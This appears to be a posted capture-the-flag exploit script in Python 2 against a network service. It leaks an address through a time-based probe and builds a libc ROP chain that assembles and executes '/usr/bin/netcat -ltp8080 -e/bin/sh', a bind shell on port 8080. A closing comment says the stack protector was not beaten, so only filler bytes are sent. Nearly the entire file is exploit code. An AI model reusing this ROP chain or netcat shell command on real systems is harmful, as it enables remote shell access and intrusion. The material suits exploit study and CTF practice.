@ntddk
Created October 25, 2013 19:42
#!/usr/bin/env python
import subprocess
import time
from struct import pack, unpack
# Half-width, in seconds, of the clock-skew window the scan loop below walks
# (it tries local_time - TIME_RANGE .. local_time + TIME_RANGE - 1).
TIME_RANGE = 10
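def readlen(h, l, wait = 0.1, timeout = 3):
    """Read up to ``l`` characters from ``h``, polling until ``timeout`` elapses.

    Args:
        h: file-like object exposing ``read(n)`` (a Popen stdout pipe here).
        l: number of characters wanted.
        wait: pause between read attempts, in seconds.
        timeout: total time budget, in seconds.

    Returns:
        The collected text: exactly ``l`` characters on success, fewer if the
        stream produced nothing more before the budget ran out.

    Raises:
        ZeroDivisionError: if ``wait`` is 0 (same as the original behaviour).
    """
    # The original computed int(timeout / wait) attempts, which is 0 when
    # timeout < wait and then returned "" without ever touching the stream.
    attempts = max(1, int(timeout / wait))
    chunks = []
    left = l
    for i in range(attempts):
        chunk = h.read(left)
        chunks.append(chunk)
        left -= len(chunk)
        if left <= 0:
            break
        # Sleeping after the last attempt only delays the caller.
        if i < attempts - 1:
            time.sleep(wait)
    # join instead of repeated += keeps this linear on every interpreter.
    return "".join(chunks)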
def get_client():
    """Spawn a fresh ``nc`` process connected to the service under test.

    Returns:
        A ``subprocess.Popen`` whose stdin and stdout are pipes, so the caller
        can write a request and read the reply through them.
    """
    argv = ['nc', '172.16.0.4', '13331']
    pipes = dict(stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    return subprocess.Popen(argv, **pipes)
offset = None
# Walk a window of clock skews around the local clock.  Each attempt opens a
# fresh connection and sends the current epoch second plus the candidate
# skew, NUL-terminated and newline-flushed.  range() is end-exclusive, so
# +TIME_RANGE itself is never tried.
# NOTE: the loop variable is called ``os``, which shadows the stdlib module
# name; harmless here because ``os`` is never imported, but easy to misread.
for os in xrange(-1 * TIME_RANGE, TIME_RANGE):
    client = get_client()
    print '[*] trying offset = %d...' % os
    client.stdin.write('%d\x00\n' % (int(time.time()) + os))
    # A reply whose first byte is 'c' counts as a hit; the next 45 bytes are
    # read back and two hex-encoded little-endian words are sliced out of the
    # reassembled message.
    head = readlen(client.stdout, 1)
    if head == 'c':
        print '[+] hit!'
        msg = 'c' + readlen(client.stdout, 45)
        addr_buf = unpack('<I', msg[16:24].decode('hex'))[0]   # never read again in this file
        addr_send = unpack('<I', msg[37:45].decode('hex'))[0]  # used to rebase ``off`` below
        offset = os  # recorded but never read again in this file
        # The connection that produced the hit is left open here; only the
        # misses are killed below.
        break
    client.kill()
p = ''
# Padding goes here
# This ROP Exploit has been generated for a shared object.
# The addresses of the gadgets will need to be adjusted.
# Set this variable to the offset of the shared library
# ``off`` rebases every gadget on the ``addr_send`` value leaked by the scan
# above.  0x000f0860 is presumably that symbol's static offset in the library
# the gadgets were taken from -- TODO confirm against the same binary.
off = addr_send - 0x000f0860
# The body below repeats one write-what-where pattern, exactly as the per-line
# gadget comments describe: load ecx with a .data slot, load eax with four
# bytes (or zero it with xor), then store eax at [ecx].  Slots are written in
# increasing order from .data + 0, so the stores assemble one contiguous
# buffer in .data.
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ee0) # @ .data
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "/usr" # /usr
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ee4) # @ .data + 4
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "/bin" # /bin
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ee8) # @ .data + 8
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "/net" # /net
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5eec) # @ .data + 12
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "catA" # catA
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5eef) # @ .data + 15
p += "AAAA" # padding
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ef0) # @ .data + 16
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "-ltp" # -ltp
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ef4) # @ .data + 20
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "8080" # 8080
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ef8) # @ .data + 24
p += "AAAA" # padding
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5ef9) # @ .data + 25
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "-e/b" # -e/b
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5efd) # @ .data + 29
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "in/s" # in/s
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f01) # @ .data + 33
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += "hAAA" # hAAA
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f02) # @ .data + 34
p += "AAAA" # padding
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
# From here on the stored values are .data addresses rather than text, i.e.
# pointers back into the buffer assembled above.
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f03) # @ .data + 35
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += pack("<I", off + 0x001a5ee0) # @ .data
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f07) # @ .data + 39
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += pack("<I", off + 0x001a5ef0) # @ .data + 16
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f0b) # @ .data + 43
p += "AAAA" # padding
p += pack("<I", off + 0x0002403f) # pop eax ; ret
p += pack("<I", off + 0x001a5ef9) # @ .data + 25
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f0f) # @ .data + 47
p += "AAAA" # padding
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x0007419a) # mov DWORD PTR [ecx],eax ; ret
# Tail: ebx, ecx and edx are loaded with .data addresses, eax is zeroed and
# then counted up by the eleven inc gadgets to 11 (the execve number in the
# 32-bit Linux syscall table), and int 0x80 issues the syscall.
p += pack("<I", off + 0x0001930e) # pop ebx ; ret
p += pack("<I", off + 0x001a5ee0) # @ .data
p += pack("<I", off + 0x000f2cff) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a5f03) # @ .data + 35
p += "AAAA" # padding
p += pack("<I", off + 0x00001a9e) # pop edx ; ret
p += pack("<I", off + 0x001a5f0f) # @ .data + 47
p += pack("<I", off + 0x00032eb0) # xor eax,eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x000064fc) # inc eax ; ret
p += pack("<I", off + 0x0002e285) # int 0x80
client = get_client()
# Refuse to continue if the assembled chain contains a NUL or a newline byte.
if p.find('\x00') != -1 or p.find('\x0a') != -1:
    print 'ERROR: \\x00 or \\x0a found on p'
    quit()
# Only a 0x10B-byte filler is written; ``p`` is built and checked above but is
# not used past this point in the file.  The author's closing note (below)
# records why the attempt stopped here.
client.stdin.write('A' * 0x10B)
# Could not beat SSP (original note, translated from Japanese; SSP is the
# stack-smashing protector, i.e. the stack canary).